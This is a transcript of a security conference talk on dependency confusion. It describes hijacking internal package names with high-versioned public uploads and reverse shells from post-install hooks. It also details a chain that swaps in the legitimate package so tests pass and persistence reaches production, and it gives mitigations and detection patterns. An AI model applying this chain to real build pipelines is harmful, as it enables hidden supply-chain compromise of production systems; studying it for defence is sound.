
I think we're ready to go. My slide still says "good morning everyone" because I didn't update my notes, so these are still all my notes from my previous talk and I won't be using them, otherwise we'll definitely have confusion today. So: good afternoon everyone, and welcome to my talk. I'd like to touch on a vulnerability called dependency confusion. My name is Tennis, I do research and consultancy things, I've been in the security field a while, and I'm honestly just enjoying it. That said, let's dive directly in. You might be confused, because we're going to talk about DevOps today, not actually red teaming, but in the end we'll tie it back to red teaming as well. I think it's worth having a conversation about how development has changed over the last couple of years. Some of you might remember words like the waterfall model, and all of the buzzwords that followed after that, like scrum master and agile and moving blockers. It's a wild field out there, but the key point I want to focus on is that today we've moved over to a lot of automation. In the past it was a manual process: you would develop code, you would test the code yourself, and
then afterwards you would go through the various stages of deploying it into different environments, testing again, and once you were happy, again following a manual process to migrate it over. Today a lot of that, if not all of it, is automated for us. We have what you can call a CI/CD pipeline, or a DevOps pipeline, and now the new buzzwords are things like DevSecOps, caring about the security of the pipeline and in the pipeline. But the key thing I want to focus on is that automation element, because what that changes is that the end result is no longer the only thing threat actors can target. Because automation has been introduced, it's not just about compromising a developer anymore: compromising any of the technologies used in that pipeline can get you to the same aim of getting into production, where in the past it might have been just a vulnerability you had to exploit. So the attack surface has grown significantly. For today we'll be using the following pipeline as a demonstration. I know it's not fully complete; I only have one environment, production, so I'm cheating a little bit by going directly to production, but bear with me. For the pipeline we're using today, we
have a developer on a workstation, there's a VPN they use to connect in, and essentially what we're saying for security is that this developer only has access to GitLab. They should only have access to the source code; from there automation takes over, and we're hoping the security of the automation deals with the rest for us. I'm also using a GitLab Runner; there are a bunch of other things you could use, GitHub has GitHub Actions for example, but I like GitLab because you can host it on-prem and do some interesting stuff with it. Then we'll basically be talking about two different packages. One of them is a Python package, a Python library we're using that we're storing on a locally hosted PyPI repo, or rather registry, and then we have a Docker image that gets built, which is basically a Flask application that we're going to host in production. As you can see from the CI configuration, we're going to talk about four different stages: prepare, build, deploy, and then the test stage that executes. So let's quickly take a look at what that's actually doing. That website, for any of you who attended
Ethan's talk: he is to blame. He set up this network and decided the best application he could come up with is one that does translation between my messages and his. So what we'll do here is look at the different stages: for prepare we basically kill the Docker container, for build we actually compile the code, then we deploy it, and then we run some tests. Those tests are important, because with the test cases we need to make sure the code is actually working. So I'm going to add some more Gen Z words for translation, just following through with what he gave me. We'll do a little bit of a translation, we'll do a commit, and once we commit, the GitLab Runner picks it up and executes that CI script for us. If we quickly take a look, we'll see that the new pipeline is running and the four stages are in action. That one should complete quite quickly, just stopping the container so we can do a rebuild, and then we give GitLab a little bit of time.
And there we go, we can see it's starting to do its build. Basically what that process is doing is creating a new Docker image, and that Docker image is compiling the Flask application. But before that step, it installs the actual dependencies required for the Flask application, and one of those dependencies, which is what we'll focus on today, is a pip package it needs to pull from that internal PyPI registry. And we can see, very importantly, that the test case actually succeeded; that's the important part. It's worth noting that these days even your unit tests are automated, and if your unit tests don't succeed, the rest of the pipeline immediately stops. I know "surprise" is misspelled, it was very early in the morning, but we can see that the translation works, the app is working, it's recompiled, and we're in the new environment. Taking this into consideration, we have to ask the question of how we would approach attacking this. I talked about a larger attack surface; what does that actually look like? If we're not looking for vulnerabilities in the actual application, what are we looking to compromise? Now, there's quite a lot of research done on this specific thing, and I would say
there are four main elements you can look at. You can, for example, inject into the source itself: maybe you're lucky and you make a pull request as a contributor, sneaking in a little bit of vulnerable code that goes undetected, and all of a sudden you've injected into the source code and your malicious code makes its way all the way through. I don't know who of you, for example, followed along with the lines.sh incident; that would be the other option, committing as a maintainer. He's just a friendly guy looking to get some stats, right, and all of a sudden, if you're using lines.sh, you're sending what might be client or confidential data off to some random server for someone to collect. Not a great idea. You can inject into the repo system itself: can you compromise credentials, can you get tokens for it, all of those wonderful things. You can look to exploit vulnerabilities in any of those software stacks as well: again, it's not just about vulnerabilities in production, but if there's a vulnerability in GitLab, in Jenkins, in anything used in that pipeline, you might have the opportunity to inject into that attack surface. There's also injection during the build, but most of that is about compromising the build system itself, and as you'll see
when we touch on dependency confusion, that's a slightly different vulnerability. Or we can look to create a new package: there are things like typosquatting of package names, and if you read some of the articles out there, it happens a lot. All of us have fat fingers when we're typing a pip install, and if you make one mistake, say numpy becomes numpie, all of a sudden someone has registered that package, it's malicious, and it's going to execute. The reason this is so important is that your build pipeline is essentially code execution at that point. It's actual code execution happening there, and it has a lot of privileges, intentionally so. The answer is not to make the installer less privileged or to reduce its functionality, because it needs those privileges: it's actually installing a package for you. But we're not going to look at any of these. What we're going to look at is a vulnerability called dependency confusion. This was originally published in 2021. Show of hands: do any of you know of this vulnerability, heard of it before? Okay, so we have a couple of people here who have heard of it. When Alex Birsan found it for the first time, he was able to compromise
Apple, Microsoft, Tesla and PayPal at the same time. He racked up $120,000 in bug bounties in one go, so it's quite a powerful one. Apple didn't want to give him the maximum payout; he was dead sure you could actually compromise everyone's Apple device, and they said no, you're stretching a bit, but I personally believe him. Essentially, this dependency confusion vulnerability stems from the fact that when your package manager performs an install, it gets the packages from multiple different locations. It's not coming from a single location, it's coming from multiple distinct locations, and the package manager needs to decide which one to install. This specific vulnerability comes from internal and external dependencies. Now, there's a lot of debate over whether a package is an internal package or an external package; for today, the distinction we'll use is: did you develop this dependency yourself and are you self-hosting it, or is it a dependency someone else developed and they are hosting it? If you think about something like jQuery, that's going to be an external dependency: you did not write jQuery (I hope the author of jQuery is not here), but you might be using that package. But let's say for your business you have a package you're using for authentication: you want to standardize the process of authentication, so you create a library or dependency that deals with authentication once, and then you self-host that package, because now whenever there's a new project you're developing, you can use that exact same package. So how does dependency confusion work? Well, it's about winning the race, and as you'll see, the race we're talking about is a race of version numbers. So let's say we have the following environment, where we have production, and then you'll notice we have two different Python, or PyPI,
registries: the external one, which is pypi.org, and the internal one, pypi.local, a registry we're self-hosting with the packages we create ourselves. What's going to happen is that the attacker needs to learn the name of the internal package, the internal dependency, and we'll touch on the various ways you can learn that name; some are super simple, some might be a little harder. But I want to make it clear: the attacker doesn't need the actual package. They don't need the source code of the package; they only need to know the name of the package in question. After they learn the name, what they do is upload the same package name to the external PyPI repo with a higher version number. That's where the trick comes in: we upload it with a higher version number. I always choose version 9000; I haven't seen a lot of software that's reached that version. Then, at the point where your build infrastructure needs to run that install, it collects the packages from multiple locations and sees: huh, I have the same package hosted internally and externally, so which one am I going to install? The decision comes down to the higher version number. On most of these, pip, gems, npm, it's the higher version number that gets installed. So all of a sudden the build occurs with the higher-numbered package version, which is the attacker-controlled package. Without knowing the source code, without knowing anything but the name of the internal package, I now have the ability to get code execution at the build stage, and then, using some very nice techniques, we have the ability to take that malicious package and infect the pipeline further.
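The version race described above can be sketched as a toy resolver. This is not pip's actual algorithm (real pip follows PEP 440 version rules and a full resolution process); it's a minimal model of why pooling candidates from every index and taking the highest version hands the win to the attacker. The package and index names follow this talk's demo.

```python
def version_key(v):
    # naive parse: "9000.1" -> (9000, 1); real pip uses PEP 440 rules
    return tuple(int(part) for part in v.split("."))

def resolve(name, *indexes):
    """Toy model of the behaviour that enables dependency confusion:
    candidates from every configured index are pooled, and the highest
    version wins, regardless of which index it came from."""
    candidates = []
    for index in indexes:
        candidates.extend(index.get(name, []))
    return max(candidates, key=lambda c: version_key(c[0]))

internal = {"genz-translator": [("1.2.0", "pypi.local")]}  # our real package
external = {"genz-translator": [("9000.1", "pypi.org")]}   # attacker's upload

print(resolve("genz-translator", internal, external))
# → ('9000.1', 'pypi.org')  -- the attacker's 9000.1 beats the internal 1.2.0
```

Note that nothing in this selection prefers the internal index; the source of a candidate never enters the comparison, which is the whole confusion.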
That's the part we're also going to focus on a little bit today. Before we showcase the basic pipeline of this, let's look at how you're able to learn a package name. Stack Overflow is my favourite. You'll see here that we have someone asking a question and divulging a little bit of information about their specific packages, and we learn the name of their internal package, which is the genz-translator. What's nice about this, and this matters for the further attack, is that we also want to learn a little about the internal PyPI registry itself. You can either learn that externally, or there are techniques to enumerate it once you've infected with dependency confusion. Where the issue comes in is with the pip install, and we'll touch on this for the mitigations as well: they're passing --extra-index-url. What that says is not "forcibly download from this one location" but "here is another potential location this package can be downloaded from". So now we know the name, and we also know where the internal repo is stored. There are other ways you can find it: before this talk I ran a search for --extra-index-url, and there weren't a lot of repos, only 18, but about 64,000 issues. Reading through those, finding a couple of package names, a couple of vendors or places that use packages, you'll definitely find some. It's also worth noting that when Alex first found this, with his search he was actually able to infect .NET, all of its versions, which is why Microsoft also paid him a bug bounty. And you can still see, if you go to that commit, that the fix was to change it from --extra-index-url to --index-url; so they were properly vulnerable, and if you're able to infect .NET, that's a lot of people in for a bad time. Also very important: we're focusing on Python packages for this talk, but as I mentioned, this can happen for Ruby with your gems and for JavaScript with npm as well. And Alex also found that a lot of the time, when you build with npm, the generated JS files sometimes disclose the names of the internal packages being used; that's another way to learn those package names when
you enumerate a web application. So how are we actually going to get remote code execution? For that, we need to talk about what you need to create an actual Python package, and we're going to keep it basic. If you want to create a Python package, you need a setup.cfg file, you need a setup.py file, and then you need the package itself. You don't strictly need a main, but I think you're a savage if you don't have one, so you have an __init__.py file and a __main__.py file. That's it; that's the bare minimum, the simplest package you can have.
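That bare-minimum layout can be sketched in a few lines. The package name matches this talk's demo, and the metadata values are placeholders.

```python
import pathlib

def make_skeleton(root="genz_translator_pkg"):
    """Create the bare-minimum layout for a pip-installable package
    (names are hypothetical, matching the demo in the talk)."""
    base = pathlib.Path(root)
    pkg = base / "genz_translator"
    pkg.mkdir(parents=True, exist_ok=True)
    (pkg / "__init__.py").touch()   # may be empty; runs on every import
    (pkg / "__main__.py").touch()   # optional entry point, may be empty
    (base / "setup.cfg").write_text(
        "[metadata]\nname = genz_translator\nversion = 9000.1\n"
    )
    (base / "setup.py").write_text(
        "from setuptools import setup\nsetup()\n"
    )
    return sorted(p.relative_to(base).as_posix() for p in base.rglob("*"))

print(make_skeleton())
# → ['genz_translator', 'genz_translator/__init__.py',
#    'genz_translator/__main__.py', 'setup.cfg', 'setup.py']
```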
For remote code execution, what we're going to do in setup.py is make use of the post-install scripts. You have pre-install, post-install, pre-develop; what these hooks do is let you execute additional commands after a certain step in the package installation. One example that any of you who do offensive security might know: with the Impacket tools, after you do the install, you can miraculously just call the scripts from the terminal; you don't need to go to the location where they're installed. That's a post-install hook: it's essentially mapping the installed scripts into a bin directory so you can use them directly. So there are legitimate reasons for these hooks, but we can use those same hooks, because Python has code execution as a feature: you can import os, and from that point you can do whatever you want. We're going to inject into that post-install section to get code execution. Let's quickly take a look at what that looks like. You'll see that we're basically going to create our package. We start with the config file, very simple, just a little bit of metadata about where to find stuff, and setup.py just pulls that config file in. Then we create two files: the first is our __init__.py, and we're not doing any code execution or anything here, we're just creating two basic files. I'm also going to populate __main__.py, but that isn't a requirement for the package to install; both of those can simply be empty files. Then it gets a little painful, because none of my tools were set up at this point, so I quickly have to install twine and the rest of my install tooling. But what you'll see is: we do the imports, we set our version number to 9000.1, because I'm pretty sure 9000 is going to win the race, and we copy over our package name. Then let's start with a little bit of code: we do our post-install, and for this one we just go with a Python reverse shell. It's going to be an ugly reverse shell; you can see in the command class we're specifying for install to hook into the post-install. I know this is wild, because I'm running os.system in Python to run Python again, to import os, to then run a shell for me, but it works. So we do that, then we try to compile, we fail miserably, and then we quickly get the right and relevant stuff. Sorry, that was not meant to happen; hold on, I just need my mouse, I'm going to skip a bit forward. Okay, cool.
On that note: when you run python -m build, it builds both a tar file and a wheel file for you, and you can't actually get code execution with a wheel file. The first thing I had to learn is that if you want code execution, you just delete the wheel file and only upload the tar file; then anyone who gets your package actually gets code execution. It really is that simple. Okay, so after creating the package we uploaded it to PyPI, and now we'll add another Gen Z word just to showcase that the pipeline itself is going to execute; I can't remember all the words I added. "That is sus." Cool. Okay, let's have the pipeline execute and give it a little bit of time. Prepare should be done by the time we get into it, and then at the build stage, where it runs pip install with the --extra-index-url, it's going to find that package both on pypi.org and on the internal repo. And what you'll see is that we have a shell. But no, don't clap, because the shell doesn't work for us; it's absolutely horrendous. And this is part of the problem: I got a shell, yay, but question number one is: where did I get a shell? That's where the confusion part of this entire talk comes in. It's red teaming, but you don't know who you're compromising, so I don't know if you can fully go this route. It's also worth noting, and I hope all of you noticed, that we were at a standstill: that entire build process did not continue while I had a shell. That's my bad; I need to create a non-blocking shell to at least let the rest of the code still execute. But great, we got that to work, and then all of a sudden we fail the test. Anyone have an idea why we failed that test?
There we go: we don't have the source code. Because we don't have the source code of the original package, at the point where the unit tests execute, at the point where it runs the import for the package, nothing happens. We will 100% fail every single one of those unit tests. And this is where I personally believe dependency confusion died a slow death: everyone said, great story bro, but it's not going to happen, we're not going to care about it or really do anything about it. Because in essence, we will know 100% when dependency confusion is happening, because the build stage will freak out. At most, you might compromise something like a developer workstation, which is great, but right at the point where they try to run the code, which is the next step after compilation, they'll figure out that something is wrong. So that's the issue: we can see the test case, the unit test, has essentially not executed, and in this case we got remote code execution in a Docker agent that's currently running a build. That doesn't really help; it's going to be detected immediately, and the best we can hope for is a compromise of a workstation. This was about four
years ago, when I played around with the vulnerability, and I found a better way. Four years ago I found a way to actually get past the entire build stage and blast through to production. I didn't want to publish it, because I didn't feel it was ethical for that information to be 100% out there; it felt a little iffy, so I decided to just leave it. If you look at, for example, some of the training I did on dependency management on TryHackMe, you'll see that's where it stops: it shows you how to get remote code execution on a Docker container, and I felt we could leave it there. But it's always been bugging me, because there are actually ways to get fully through to production. Or there were, let me make that very clear: there were, and then there was some trouble this week. Basically, we have a post-install hook, and we're in the exact location where a pip install is running, so why don't we actually use that? This led me down a path four years ago where I investigated how pip actually installs packages, and how pip determines whether a package is actually installed. You just see succeeded or failed, and that's not
always determined just by errors or things going wrong; what actually tells pip that a package has successfully installed? So we're going to do a couple more steps, and essentially we need to find the location of what's called the egg file. Until recently, and I need to keep saying that caveat, pip would look for an egg file placed in the directory where it installed the package, and upon exit pip would read it. If that file (a) exists and (b) has the right information in it, pip says cool, the package installed successfully, we move on our merry way, and pip exits with success. So what I feverishly crafted is this: what if we first save the location of that egg file while it's installing our package? Remember, this is post-install, so we save the egg-info location. Then we run pip again to uninstall ourselves, so we uninstall our malicious version, and then we actually fix the code where they made their mistake: rather than using --extra-index-url, we use --index-url, forcing pip to use the internal repo. Once it has installed the correct version, the only thing that remains is to take the correct version's egg file and place it in the location where pip is looking for our malicious install's egg file. And there you go: all of a sudden we're solving a couple of problems. Firstly, pip is not going to error out, because it finds that the install has succeeded. Secondly, we solve that massive problem of not having access to the source code: at this point, if this has executed, we will have actually installed the legitimate package, so the unit tests are going to run, and all of them are going to succeed.
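A filesystem-level simulation of that egg-info swap, for the old egg-based pip behaviour described above. The real pip uninstall/install calls are shown only as comments; the paths and package name are hypothetical.

```python
import pathlib, shutil, tempfile

def egg_info_swap(site_packages, pkg, legit_egg_src):
    """Simulate the (pre-2025, egg-based) trick: make pip's exit check
    find a legitimate-looking egg-info for OUR install location."""
    # 1. remember where pip will look for our package's egg-info
    egg = pathlib.Path(site_packages) / f"{pkg}.egg-info"
    # 2. real attack: run `pip uninstall -y <pkg>` to remove ourselves
    shutil.rmtree(egg, ignore_errors=True)
    # 3. real attack: `pip install --index-url https://pypi.local/simple <pkg>`
    #    which pulls in the legitimate package (URL is hypothetical)
    # 4. drop the legitimate egg-info where pip checks for our install,
    #    so pip exits believing the install succeeded
    shutil.copytree(legit_egg_src, egg)
    return egg

# toy demo in a temporary "site-packages"
with tempfile.TemporaryDirectory() as site:
    legit = pathlib.Path(site) / "legit.egg-info"
    legit.mkdir()
    (legit / "PKG-INFO").write_text("Name: genz-translator\nVersion: 1.2.0\n")
    swapped = egg_info_swap(site, "genz_translator", legit)
    print((swapped / "PKG-INFO").read_text().splitlines()[0])
    # → Name: genz-translator
```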
And if you're not like me, writing an os.system command, but actually sneaky with your persistence, you have the ability to embed persistence and wait until this compiled package makes its way to production; at that point it executes and you have code execution on production. If you ask me, I would love to see the faces of the incident response team that has to deal with that. Where do you start? Where are the logs to tell you that production is suddenly infected with a persistence mechanism? How do you trace that back to the actual build stage? And what's worth noting here is that we're leveraging something that will become important: we know for a fact that for something to be a Python package, the one file it always has to have is the __init__.py file. So you embed your persistence in the __init__.py, because only savages put code in the __init__.py; you're 99.99% sure the actual package won't have code in there. It shouldn't; it should be an empty file, and every tutorial you read tells you it's an empty file. But it executes as soon as you import the package. So now we've embedded persistence in an __init__ file, which means we're not overwriting any of the sensitive code, and at the point where they run import package, our remote code execution fires.
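Embedding persistence in a package's __init__.py can be sketched as a simple append: any existing code is kept, the payload goes at the end, and it runs on the first import of the package. The payload line here is an inert placeholder, not a real persistence mechanism.

```python
import pathlib

PAYLOAD = "# persistence payload would go here (placeholder)\n"

def embed_persistence(init_path):
    """Append a payload to a package's __init__.py. Since __init__ is
    usually empty, this rarely clobbers real code, and it executes on
    the very first `import <package>`, including in production."""
    p = pathlib.Path(init_path)
    original = p.read_text() if p.exists() else ""
    # keep whatever code was there (usually nothing), then the payload
    p.write_text(original + PAYLOAD)
    return p.read_text()

demo = pathlib.Path("demo_init.py")
demo.write_text("")                        # the typical empty __init__.py
print(embed_persistence(demo) == PAYLOAD)  # → True
```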
So this worked for four years, and then Monday morning at 1:00, none of my pipelines worked. I reverted back to the normal flow and got failed, failed, failed, failed, and I didn't understand why. I promise you this exploit worked for me; I'm standing here feeling like a snake-oil salesman, but it worked for the last four years, and all of a sudden, a week before my demo, Python decided it's not going to happen, and every single one of my pipelines was failing. I had to do a bit of investigation, and it turns out Python doesn't use egg files anymore at all. So the entire principle of my compromise was gone, because what Python, or more importantly pip in its later versions, is doing now is no longer using the egg file and no longer distributing it to the install location. Instead, it builds the package in a temporary location and uses that to produce the dist-info you can see there. But they were not done screwing me over. The other part they got me on is that post-install is no longer post-install. You can do some funky stuff with threads and get very, very close, but they learned that it's bad for the package to be fully deployed before post-install executes. So what happens now is that post-install is the very last step before the wheel gets compiled and the wheel gets dropped. You physically can't do post-install anymore like you did in the past: always, after your post-install, it runs the compile step and then does the deploy. And that's an issue, because remember, our entire path to get to production relied
on the fact that we can uninstall ourselves, that we don't need our code anymore and can replace it with the legitimate version. So it was not good. I had to decide what we were going to do for today, and I was this close to contacting Charles and saying, I'm out, I think you need to find someone else to do a talk at the last minute. This was about 2:00 in the morning, and I said, well, let's try; we did it once, we can find it again. So let's go back to the basics of what's actually happening here. As I mentioned, post-install now executes before the compile and deploy. You can see that "after copy" is me doing a print in the post-install phase after the install has run, and only after that is it building the wheel, creating the wheel, and then deploying it. You physically can't get past that point, and trust me, Python does not like threads; I gave it so many threads trying to get past that point. The last steps pip executes are compiling that wheel and deploying it for you. But it's worth noting we're still in a position where pip is being used, so we can still do this; we
just have to be a little bit smarter so essentially we're going to change a couple of things right the first thing that we're going to do is that immediately now we are going to install the correct package why cuz remember it hasn't yet compiled our wheel the package doesn't yet exist right so when you run pipin stall in a pipin stall right it's actually going to install so this is going to install the correct version of the package and deploy it okay that's great but remember it's going to compile our package and it's going to overwrite that version and we don't want that so what we are going to do is we're going to determine where
it's actually running that install that Alis say Al I know it's bad OBS that was sanity in like 3 4:00 in the morning right but what we are going to do is essentially we will embed the persistence in that package so we're still going for in the in it file of remember this is the legitimate package I know we're all confused myself as well right let's keep this together okay this is the legitimate package we are embedding persistence in the legitimate package our malicious package has not yet installed we with it cool okay great then we keep a backup okay that's very important keep a backup of the legitimate package because remember we're going to overwrite it right so
essentially we keep a backup of the legitimate package and then this is where the second part comes in in our malicious package we are now going to be a Savage and actually execute code and in it so what we do remember it's now going to compile our malicious package and then essentially is going to override the legitimate package again with the malicious package but now in our malicious package what we are going to do is we are again going to find a location of where we're installed we're going to run pip uninstalled now so it's very interesting when your package is loaded into memory right that's the point where you can actually uninstall it it doesn't need the files anymore
It's not like a Windows system that locks the file; once Python has it running in memory, it's perfectly fine. So we're going to uninstall ourselves, and we are going to flush that directory into oblivion. The reason we need to do that is because pip is not actually going to do a full replacement of the legitimate package; it is only going to overwrite files that match between the original one and our malicious one. And remember, we're keeping things minimal: we only have an __init__ file. So technically the normal package is already there and we've only overwritten the __init__ file, but for good opsec we actually want to remove ourselves. So we blast it, and then
we take the backup that we kept and we put it in the location where it's expecting it, and now we're done. We basically have the legitimate package in the right place, so the unit tests are going to work, and we have embedded persistence. Crazy. Let's watch it. Cool, okay. So essentially, just to showcase it again: we basically have our install where we are fixing the code for them, so instead of --extra-index-url we are using --index-url, which forces it to install from the internal location. And then what we're going to do is embed into the actual one. And notice the little ampersand; I learned my mistake, it's
non-blocking: we want that child to execute but the rest of it to still run. And then, as mentioned, we are going to keep a safe backup of that code. And then, worth noting, in our __init__ file what we are going to do is: find our location, uninstall ourselves, nuke the directory, and then copy the backup to the legitimate location it needs to be in. So, all of that being said (this was like 4 or 5:00 in the morning), you can see I even deleted 'sus'; I was reverting code as much as possible to try and get this back.
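The __init__.py logic just recapped can be sketched roughly like this. To be clear, this is a hedged reconstruction, not the speaker's actual code: the package name, backup path, and helper names are all assumptions, and the sketch only builds and prints the plan rather than executing the destructive steps.

```python
import shutil
import subprocess
import sys
from pathlib import Path

PKG_NAME = "internal-pkg"                       # assumed internal package name
BACKUP_DIR = Path("/tmp/internal_pkg_backup")   # assumed backup location

def cleanup_plan(pkg_dir: Path, backup_dir: Path) -> list:
    """Return the ordered actions described in the talk."""
    return [
        # 1. uninstall the malicious copy; safe even while it's loaded in memory
        ("run", [sys.executable, "-m", "pip", "uninstall", "-y", PKG_NAME]),
        # 2. pip only overwrote matching files (just __init__.py here),
        #    so remove the whole directory to kill any leftovers
        ("rmtree", pkg_dir),
        # 3. restore the backed-up legitimate package where it's expected
        ("copytree", (backup_dir, pkg_dir)),
    ]

def execute_plan(plan):
    for kind, arg in plan:
        if kind == "run":
            subprocess.run(arg, check=False)
        elif kind == "rmtree":
            shutil.rmtree(arg, ignore_errors=True)
        elif kind == "copytree":
            shutil.copytree(*arg)

# where this package lives: the directory containing this __init__.py
# (guarded so the sketch also runs outside a real package)
pkg_dir = Path(globals().get("__file__", "sketch.py")).resolve().parent
plan = cleanup_plan(pkg_dir, BACKUP_DIR)
print([kind for kind, _ in plan])  # prints: ['run', 'rmtree', 'copytree']
```

In the real attack, `execute_plan(plan)` would run from the malicious package's __init__.py the first time it is imported during the build.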
So let's add another word, and then let's actually see that we blast all the way into production. I don't know, don't ask me why these are the words that they are. Okay, so let's look at our pipeline. You can see all of my miserable fails before this as well. And let's see what it's going to do: the prepare stage is going to run, then let's look at the build stage and what's going to run there as well. Okay, here we go, it should install our package now. Let's go get our shell. Now, worth noting here, we're passing the build stage without getting a shell,
which is expected, because it should do the right things as soon as the package executes for the first time. So there we can see that essentially the entire build step has succeeded. Let's quickly make sure that the steps are there, and you can notice that it says it installed version 932 (a lot of versions), but that it actually installed 0.1.3, which is the actual package. So let's then see the test stage. We can see that the tests passed, so this means that our entire pipeline succeeded, and this time we have a shell, and one that's worthy. So finally, finally, we actually have a shell in production. And just to show that the
actual application is working as intended, and it is doing what it should. Lots of sanity lost, but we finally got there, with everything working. Okay, now on this note, just a couple of things that I want to finish on. The reason I believe this is quite a potent attack for you to perform out there is that there's not a lot of information given to someone that this is happening. You saw the build stage completed as normal, and you saw that one line that basically mentioned that a different package was installed and then the correct version of the package was installed. It's also worth noting that I was
running pip in verbose mode, which I don't think a lot of people do. If you don't run it in verbose mode you lose even more of the opsec indicators: it's not even going to tell you that it found two versions, it's just going to blast through and do its install. Okay, now it's worth noting that the same dependency confusion vulnerability is something that you can find in both Gems, for Ruby, and also in npm, and this is part of the rest of the exploration that I want to go on. For npm you have things like preinstall, install, and postinstall scripts, so different places where you can inject.
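For reference, those npm lifecycle hooks live in a package's package.json. This is a hypothetical illustration (the package name, version, and script contents are all invented); npm runs each of these scripts automatically at the corresponding point of the install:

```json
{
  "name": "internal-pkg",
  "version": "9000.0.0",
  "scripts": {
    "preinstall": "node payload.js pre",
    "install": "node payload.js main",
    "postinstall": "node payload.js post"
  }
}
```

An attacker abusing dependency confusion in npm does not even need to wait for an import: the install itself executes code.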
And again, in a lot of those cases, that race condition of the higher version numbers is going to happen: most package managers are configured to use multiple different sources for their packages, because you have both internal and external packages in the mix, and if you can create this confusion, the higher version number is going to win. So what can we do for mitigations? If you were at Ethan's talk, you'll notice the difference between mitigations and remediations, and that is because I don't really think there is a full-blown remediation for dependency confusion. Everything you're going to do is going to have something else for you to
think about and something to do, apart from the last one, which I think is a pretty decent one. But essentially, the first thing we can do is lock down the repos, or the registries. We can split out our list and say: these are the installs for internal dependencies, these are the external dependencies, and run them as separate steps where you're pointing directly to the specific registry it needs to pull the package from. I think it can work, but that's been one of my biggest gripes with the entire fight between --index-url and --extra-index-url.
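A sketch of what those separate steps could look like in a pipeline config. Everything here is an assumption for illustration (the registry URL, file names, and CI syntax); the point is that each step uses --index-url, which pip treats as the only index for that install, rather than --extra-index-url, which merely adds one:

```yaml
install_dependencies:
  script:
    # internal names can only ever resolve against the internal registry
    - pip install --index-url https://pypi.internal.example/simple -r requirements-internal.txt
    # external names can only ever resolve against the public registry
    - pip install --index-url https://pypi.org/simple -r requirements-external.txt
```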
I can fundamentally understand why you would want to just add another registry and not necessarily lock it down to one single registry. If you just look at how anything works, it has multiple locations, because one location can fail, so it makes sense to me why certain people want to do something like an --extra-index-url. One of the things you can do, and this is a surefire way to fight against this, is version pinning. In your packages you can pin them to a version, and there are a lot of people that do this. My personal issue with that is it becomes outdated: as soon as you version pin, you're going to version pin into oblivion.
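A minimal sketch of pinning in a requirements.txt (the package names and versions here are hypothetical). The == specifier tells pip to accept exactly this version, so a higher-versioned imposter on another index no longer wins automatically:

```text
internal-pkg==0.1.3
requests==2.31.0
```

The trade-off is exactly the one described above: the pins go stale unless someone actively maintains them.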
Which then means, if there is an actual vulnerability in the package, you will not receive that update. But if you version pin, you are telling pip it needs to look for this exact version. The other thing you can do, in certain cases, is tell the package manager to change its priority. This is not something you can directly do in pip, for example, but if you're using something like JFrog Artifactory or Azure DevOps, you can actually tell it what the priority of searching for packages is. But then you need to change the priority so that it's not version-number based but rather the priority of which registry
it's going to hit first. And then the other thing that we are seeing, and I personally believe this is one of the best remediations you can do, is this: if you have internal dependencies, register the package name externally as well. Claim that space. What works really, really well with something like npm is you can register the name 'mwr', and then all of your packages can be 'mwr.this-package', 'mwr.that-package', because you own the name 'mwr'. No one can essentially register a package that starts with 'mwr.', so you own that entire top-level namespace for all packages in that location.
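In npm specifically, this kind of name-claiming is usually done with scoped packages: if your organisation owns the scope, nobody else can publish into it. A hypothetical example, with the scope and package name invented for illustration:

```json
{
  "name": "@mwr/this-package",
  "version": "1.0.0"
}
```

Whether you use a scope like this or a plain 'mwr.' prefix as described in the talk, the discipline is the same: every internal package actually has to use the namespace.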
That's something you can do, but then again you need to make sure that all your developers are actually keeping to that convention and using that namespace for their packages. And then, just lastly, to end off: what are the detections for this, and what can we do here? I think you can hunt for the vulnerable installs, like I showed you: --extra-index-url is one of the things that shows it. Whenever Gems has a source, or npm has a -s attached in the command, you know that they're adding additional registries, and you need to do some sanity checking there.
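A hedged sketch of that hunt. Only the pip flag --extra-index-url comes straight from the demo; the gem and npm patterns are assumptions about how extra registries typically show up in commands, so tune them to your environment:

```python
import re

# patterns that suggest a command is adding an extra package registry
SUSPECT_PATTERNS = [
    r"--extra-index-url",    # pip pulling from more than one index
    r"\bgem\b.*--source",    # gem install pointed at an extra source (assumed form)
    r"\bnpm\b.*--registry",  # npm told to use a non-default registry (assumed form)
]
SUSPECT = re.compile("|".join(SUSPECT_PATTERNS))

def find_suspect_lines(text: str) -> list:
    """Return the lines of a build script that deserve a sanity check."""
    return [line for line in text.splitlines() if SUSPECT.search(line)]

# hypothetical CI script to scan
ci_script = """\
pip install --extra-index-url https://pypi.org/simple internal-pkg
npm install --registry https://registry.example.com left-pad
echo build done
"""
print(find_suspect_lines(ci_script))  # prints the two registry-adding lines
```

In practice you would point this at your repository of pipeline definitions rather than a string, but the idea is the same: flag every place a build can reach more than one registry.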
And then the other thing that I realized, looking at it and looking at the logs that I have in my actual build output, is that those pipeline logs are crucial. I hope that we can get to a stage where you can do stuff like a pip install --verbose, as ugly as that is and as much information as it generates, because the log files of our build stages actually play a large role. It's not just enough to have logging in production; we need to have logging that goes through that entire pipeline and keeps that information for us. And this is not just for dependency confusion but for other pipeline attacks out there as well: as soon as there's an attack on the
actual pipeline, your production logs are not going to be the place to try and piece together what has actually happened. And then, just lastly: thanks to Alex for the initial research, which inspired me to look into this and to take it further. And thanks to TryHackMe for sponsoring my AWS bill, which, if any of you have AWS, you know is expensive, so that definitely helps. Thank you very much. Any
questions? Yes?
Yeah, I mean, I played around with that a lot when pip started doing things differently, so I was doing a super of a super of a super to try and get it past that compile stage, and I just physically couldn't. But for me that's an interesting part. A more interesting one that I would actually like to do is exfiltration of the source code of that internal package, because at the point where you have the source code, you can hunt for more vulnerabilities. And even if they fix dependency confusion, at that point you actually sit with that source code, which might be intellectual property at best, and at worst has some
vulnerabilities that you can exploit as well. But yeah, I felt very dirty writing code in __init__.py; it should not be there, but it does work. So yes, any other
questions? Probably the one that it hit first, and I need to check how it depends on that order, but like I said, just version 9,000, that's taking you to the moon. Any other questions? Thank you very much. [Applause]